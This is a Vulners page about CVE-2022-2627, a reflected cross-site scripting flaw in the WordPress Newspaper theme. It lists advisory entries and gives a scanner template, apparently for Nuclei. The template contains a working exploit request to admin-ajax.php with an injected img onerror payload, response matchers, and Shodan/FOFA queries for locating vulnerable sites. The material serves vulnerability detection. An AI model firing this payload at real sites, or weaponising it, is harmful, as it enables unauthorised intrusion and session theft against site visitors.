| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2022-2627 | 31 Oct 202219:38 | โ | circl | |
| WordPress theme Newspaper ่ทจ็ซ่ๆฌๆผๆด | 31 Oct 202200:00 | โ | cnnvd | |
| CVE-2022-2627 | 31 Oct 202200:00 | โ | cve | |
| CVE-2022-2627 Newspaper < 12 - Reflected Cross-Site Scripting | 31 Oct 202200:00 | โ | cvelist | |
| CVE-2022-2627 | 31 Oct 202216:15 | โ | nvd | |
| CVE-2022-2627 | 31 Oct 202216:15 | โ | osv | |
| WordPress Newspaper premium theme <= 11.5.1 - Reflected Cross-Site Scripting (XSS) vulnerability | 10 Oct 202200:00 | โ | patchstack | |
| Cross site scripting | 31 Oct 202216:15 | โ | prion | |
| PT-2022-17756 ยท WordPress ยท Newspaper | 31 Oct 202200:00 | โ | ptsecurity | |
| CVE-2022-2627 | 23 May 202500:10 | โ | redhatcve |
id: CVE-2022-2627
info:
name: WordPress Newspaper < 12 - Cross-Site Scripting
author: ramondunker,c4sper0
severity: medium
description: |
WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
remediation: Fixed in version 12
reference:
- https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
- https://nvd.nist.gov/vuln/detail/CVE-2022-2627
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-2627
cwe-id: CWE-79
epss-score: 0.00969
epss-percentile: 0.57597
cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: tagdiv
product: newspaper
framework: wordpress
shodan-query: http.html:/wp-content/themes/newspaper
fofa-query: body=/wp-content/themes/newspaper
publicwww-query:
- "/wp-content/themes/Newspaper"
- /wp-content/themes/newspaper
tags: cve2022,cve,xss,wordpress,wp,wp-theme,newspaper,wpscan,tagdiv,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=
payloads:
xss_payload:
- "--><form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- <form><math><img onerror=alert(document.domain) src=1><mtext>
- td-block-
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100ed370b2976619c26286ebe4c24feaadbcf9472c2c0520290041ebd13d9c3f1610221009d6a1daba3a26b7fe8e1cbd3fe500e2b84b0cadcc9c666b6690aa0cfdc4ab69c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation